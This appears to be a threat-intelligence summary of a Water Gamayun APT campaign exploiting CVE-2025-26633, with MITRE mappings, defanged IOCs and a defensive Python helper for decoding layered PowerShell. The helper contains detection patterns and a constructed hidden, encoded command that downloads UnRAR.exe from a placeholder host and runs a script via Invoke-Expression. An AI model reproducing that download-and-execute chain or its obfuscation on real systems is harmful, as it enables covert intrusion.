Zscaler Threat Hunting Discovers and Reconstructs a Sophisticated Water Gamayun APT Group Attack

Zscaler reconstructed a multi-stage intrusion attributed to the Water Gamayun APT that used a compromised BELAY Solutions site and a lookalike domain to deliver a double-extension RAR disguised as a PDF, exploit MSC EvilTwin (CVE-2025-26633) via mmc.exe, and chain hidden PowerShell stages to deploy a final ItunesC loader. Zscaler attributed the campaign to Water Gamayun based on unique TTPs, including MSC EvilTwin exploitation, nested Base64/UTF-16LE PowerShell obfuscation, trusted-binary proxy execution via mmc.exe, window-hiding tradecraft, and dual-path infrastructure patterns. #WaterGamayun #CVE-2025-26633

Keypoints

  • Attack began with a Bing search redirect from a likely-compromised belaysolutions[.]com to a lookalike domain belaysolutions[.]link hosting a double-extension RAR (pdf[.]rar) masqueraded as a PDF brochure.
  • Opening the archive dropped an .msc file that exploited MSC EvilTwin (CVE-2025-26633) to load a malicious MMC snap-in and execute embedded TaskPad commands.
  • Stage-1 PowerShell used -EncodedCommand to download UnRAR.exe and a password-protected RAR, extract the next stage, and Invoke-Expression on decoded scripts.
  • Stage-2 compiled a small C# class (WinHpXN) to hide console windows, displayed a decoy PDF, and downloaded/executed the final loader ItunesC.exe multiple times for persistence.
  • Final payload (ItunesC.exe) installed backdoors or stealers; Zscaler could not fully confirm the exact malware due to non-responsive C2, though Water Gamayun’s toolkit includes EncryptHub, SilentPrism, DarkWisp, and Rhadamanthys.
  • Attribution to Water Gamayun was based on rare MSC EvilTwin usage, characteristic nested Base64/UTF-16LE obfuscation with underscore-replace, process-hiding code, randomized dual-path infrastructure, and social-engineering lures.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – Exploited MSC EvilTwin (CVE-2025-26633) to execute a malicious MMC snap-in (‘The first payload exploited CVE-2025-26633, a weakness in MMC’s multilingual path resolution.’)
  • [T1218] Signed Binary Proxy Execution – Abused mmc.exe to load and run a malicious snap-in and associated TaskPad commands as a trusted binary proxy (‘mmc.exe resolves MUI paths that load the malicious snap-in instead of the legitimate one, triggering embedded TaskPad commands’)
  • [T1059.001] PowerShell – Used encoded PowerShell (-EncodedCommand) and Invoke-Expression to decode, chain, and execute staged scripts (‘Decoded via -EncodedCommand, this script downloads UnRAR.exe and a password-protected RAR… then Invoke-Expression on the extracted script.’)
  • [T1027] Obfuscated Files or Information – Employed nested Base64 and UTF-16LE encoding with underscore-replace string cleanup to hide payloads and commands (‘nested Base64, UTF-16LE encoding, and runtime string cleanup’)
  • [T1105] Ingress Tool Transfer – Downloaded auxiliary tools and archives (UnRAR.exe, password-protected RARs) from remote hosting to deliver next-stage payloads (‘this script downloads UnRAR.exe and a password-protected RAR, extracts the next stage’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Used HTTP(S) downloads and C2 hosting on a single IP with randomized path prefixes for payload delivery and potential command-and-control (‘hosted on a single IP (103[.]246[.]147[.]17) with two randomized path prefixes (`/cAKk9xnTB/` and `/yyC15x4zbjbTd/`)’)
  • [T1055] Process Injection – Injected or executed malicious code within the mmc.exe context to run snap-in payloads and TaskPad commands (‘to inject code into mmc.exe, leveraging TaskPad snap-in commands to kick off a series of hidden PowerShell stages.’)
  • [T1204.002] User Execution: Malicious File – Relied on the user opening a masqueraded file (pdf[.]rar) to gain execution (‘Masqueraded RAR URL: belaysolutions[.]link/pdf/hiring_assistant[.]pdf[.]rar’)
  • [T1564] Defense Evasion: Hidden/Obfuscated Execution – Hid console windows via a compiled C# class (WinHpXN calling ShowWindow) to reduce user visibility of malicious activity (‘compiles C# WinHpXN to hide console windows, displays a decoy PDF, and downloads, extracts, and executes the final loader’)
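The T1059.001 and T1027 entries describe the chain a responder has to peel back from process-creation telemetry: an outer `-EncodedCommand` argument (Base64 of UTF-16LE), an inner `FromBase64String` literal padded with underscores that the script strips at runtime, and an innermost stage that fetches UnRAR.exe and hands off to `Invoke-Expression`. The Python triage helper below is an added example, not Zscaler's code or anything recovered from the campaign: the sample command lines are constructed here, the host `placeholder.invalid` is a placeholder, and the "underscore inserted every four characters" filler is an assumption about how the cleanup pattern looks, chosen only so the unwrapping logic has something to strip.

```python
"""Unwrap layered PowerShell -EncodedCommand / FromBase64String payloads from
process-creation command lines and flag the tradecraft the report lists.
Added example (not Zscaler's code); sample inputs are constructed."""
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by a Base64 argument.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
# A Base64 literal handed to FromBase64String; underscores are allowed because
# the filler-plus-Replace('_','') cleanup is exactly what we want to undo.
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=_]+)['\"]", re.I)

# Indicators checked on every unwrapped layer (defender-side labels).
FLAG_PATTERNS = {
    "invoke-expression": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
    "download-cmdlet": re.compile(
        r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|\biwr\b", re.I),
    "unrar-transfer": re.compile(r"unrar", re.I),
    "hidden-window": re.compile(r"-windowstyle\s+hidden|showwindow", re.I),
    "nested-base64": re.compile(r"frombase64string", re.I),
    "mmc-snapin": re.compile(r"mmc\.exe|\.msc\b", re.I),
}


def _bytes_to_text(raw: bytes) -> str:
    """Decode as UTF-16LE when the odd bytes look like UTF-16 zero padding, else UTF-8."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def _decode_b64(literal: str) -> str:
    """Strip the underscore filler (not valid Base64 anyway), fix padding, decode."""
    cleaned = literal.replace("_", "")
    cleaned += "=" * (-len(cleaned) % 4)
    return _bytes_to_text(base64.b64decode(cleaned))


def unwrap_layers(cmdline: str, max_depth: int = 6) -> list:
    """Return [original, layer1, layer2, ...] until no further encoding is found."""
    layers = [cmdline]
    current = cmdline
    for _ in range(max_depth):  # bounded so a crafted input cannot loop forever
        m = ENCODED_ARG.search(current)
        if m:  # -EncodedCommand is always UTF-16LE by PowerShell's definition
            padded = m.group(1) + "=" * (-len(m.group(1)) % 4)
            current = base64.b64decode(padded).decode("utf-16-le", errors="replace")
            layers.append(current)
            continue
        m = B64_LITERAL.search(current)
        if m:
            current = _decode_b64(m.group(1))
            layers.append(current)
            continue
        break
    return layers


def triage(cmdline: str) -> dict:
    """Unwrap every layer and collect the indicator labels seen across all of them."""
    layers = unwrap_layers(cmdline)
    flags = {name for text in layers for name, pat in FLAG_PATTERNS.items() if pat.search(text)}
    return {"layers": layers, "flags": sorted(flags)}


def _b64_utf16(text: str) -> str:
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# --- Constructed samples (not from the report; host and paths are placeholders) ---
INNER = ("Invoke-WebRequest 'http://placeholder.invalid/UnRAR.exe' -OutFile $env:TEMP\\UnRAR.exe; "
         "Invoke-Expression (Get-Content $env:TEMP\\stage.ps1 -Raw)")
_inner_b64 = _b64_utf16(INNER)
# Assumed filler pattern: an underscore every four characters, removed at runtime.
_inner_padded = "_".join(_inner_b64[i:i + 4] for i in range(0, len(_inner_b64), 4))
MIDDLE = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
          f"'{_inner_padded}'.Replace('_','')));Invoke-Expression $s")
SAMPLE_MALICIOUS = f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {_b64_utf16(MIDDLE)}"
SAMPLE_BENIGN = "powershell.exe -NoProfile -Command Get-Service -Name Spooler"

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        result = triage(sample)
        print(f"{len(result['layers'])} layer(s); flags: {result['flags']}")
        print("  innermost:", result["layers"][-1][:80])
```

Flags are collected across all layers rather than only the innermost one, because the `-WindowStyle Hidden` lives in the outer command line while the download and `Invoke-Expression` only appear after two decodes; a rule that inspects a single layer misses one or the other. The UTF-16LE heuristic in `_bytes_to_text` is deliberately loose (it only looks for zero high bytes) so that an inner stage encoded as UTF-8 still decodes readably.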

Indicators of Compromise

  • [Files & Hashes] Payloads and tooling observed – Hiring_assistant.pdf.rar (MD5: ba25573c5629cbc81c717e2810ea5afc), UnRAR.exe (MD5: f3d83363ea68c707021bde0870121177), and 4 more hashes.
  • [Archive Passwords] Passwords used to protect staged RARs – k5vtzxdeDzicRCT, jkN5yyC15x4zbjbTdUS3y
  • [Network & Paths] Hosting IP and randomized delivery paths – IP 103[.]246[.]147[.]17 with paths such as /cAKk9xnTB/UnRAR.exe and /yyC15x4zbjbTd/ItunesC.rar
  • [Domains] Legitimate and lookalike domains used in delivery – belaysolutions[.]com (legitimate, potentially compromised), belaysolutions[.]link (malicious)
Read more: https://www.zscaler.com/blogs/security-research/water-gamayun-apt-attack